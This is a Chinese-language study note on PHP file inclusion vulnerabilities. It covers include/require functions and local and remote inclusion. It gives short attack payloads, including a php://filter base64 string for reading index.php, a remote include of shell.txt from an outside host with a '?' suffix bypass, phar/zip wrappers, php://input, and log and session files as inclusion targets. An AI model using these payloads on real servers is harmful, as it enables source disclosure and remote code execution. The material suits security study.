一、基本概念
- 文件包含
将相同函数写入单独的文件中,需要使用时直接调用 - 文件包含漏洞
将被包含的文件设置为变量,导致客户端可以恶意调用一个恶意文件 - 相关函数
- include()
- include_once()
- require()
- require_once()
include()若没有找到文件,只报warning;require()报错停止
once说明值包含一次
包含可执行文件时会直接执行
二、本地文件包含
- 包含的实现
包含的时候,不一定要包含.php文件,只要包含一块完整的php代码,例如a.jpg,内容为<?php phpinfo();?>
- 具体场景
由于被包含的文件类型多种多样,因此在实现的时候,重点在于找到可控文件- 比如说能够上传图片,就去穿一个带完整php代码的图片文件,或者是将代码文件改后缀
- 压缩包使用伪协议
三、远程文件包含
- 远程包含的条件
- allow_url_fopen
- allow_url_include
[http|https|ftp]://www.bbb.com/shell.txt
若后缀名写死,可以使用?绕过
例如www.bbb.com/shell.txt?a.php
伪协议
- php归档
- phar://archive.zip/file.txt
- zip://archive.zip#dir/file.txt(#有时需要替换为%23)
- 利用php流
- php://filter是一种元封装器,用于数据流打开筛选过滤的应用。对于一体式的文件函数非常有用,类似readfile()、file()和file_get_contents()
?file=php://filter/convert.base64-encode/resource=index.php
- php://input
利用条件:- 1、allow_url_include=On
- 2、对allow_url_fopen不做要求
- php://input可以读取没有处理过的POST数据
- php://filter是一种元封装器,用于数据流打开筛选过滤的应用。对于一体式的文件函数非常有用,类似readfile()、file()和file_get_contents()
- php归档
四、具体场景
日志文件
web服务器会将请求写入到日志文件中,比如说apache。当用户发起请求时,会将请求写入access.log,当发生错误时将错误写入error.log。默认情况下,日志保存路径在/var/log/apahce2/- session
- php默认生成的Session文件往往存在/tmp目录下
- session.upload_progress.enabled这个参数在php.ini默认开启,如果不是Off,就会在上传过程中生成上传进度文件,它的储存文件路径可以在phpinfo获取到